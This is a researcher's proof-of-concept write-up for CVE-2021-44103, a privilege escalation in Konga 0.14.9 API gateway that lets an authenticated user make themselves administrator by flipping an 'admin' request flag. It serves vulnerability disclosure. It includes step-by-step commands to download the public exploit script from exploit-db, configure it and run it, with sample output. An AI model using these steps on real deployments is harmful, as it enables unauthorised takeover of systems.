Share
## https://sploitus.com/exploit?id=A00E4CA2-764A-5006-9E88-00CDF5E0C3A9
# CVE-2021-44103
A proof of concept for KONGA 0.14.9 - Privilege Escalation.

## Intro
On November 16, 2021, Fabrício Salomão and I found a vulnerability in Konga API Gateways, allowing any authenticated user to become an administrator.

## Report Vulnerability

Product: KONGA<br/>
Model: 0.14.9<br/>
Vulnerability: Privilege Escalation<br/>
Impact: Full admin access (vertical privilege escalation)<br/>
Authentication: required<br/>
Exploit Author: [Fabricio Salomao](https://twitter.com/_SOl0m0n) / [Paulo Trindade](https://twitter.com/paulotrindadec)

## PoC

Bellow has created a normal user called "usernormal" without privilege.

![Crash](/images/konga01.png)

![Crash](/images/konga02.png)

Through of request bellow was changed the flag "FALSE" in the parameter "admin" to "TRUE".

![Crash](/images/konga03.png)

Therefore was created an exploit for us : https://www.exploit-db.com/exploits/50521

![Crash](/images/konga04.png)

After running the exploit, the privilege escalation was a success!

Result:

![Crash](/images/konga05.jpg)

## Running the exploit

```
wget https://www.exploit-db.com/raw/50521 -O 50521.py

Edit 50521.py

Modify:

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga"            # change user
password = "changeme"                     # change password

Execute:

python 50521.py

[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success
```

## LINKS

http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html

https://www.exploit-db.com/exploits/50521

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103

https://github.com/advisories/GHSA-f2mp-8fgg-7465

https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821

https://twitter.com/CVEnew/status/1508455166885961732

https://twitter.com/search?q=CVE-2021-44103&src=typed_query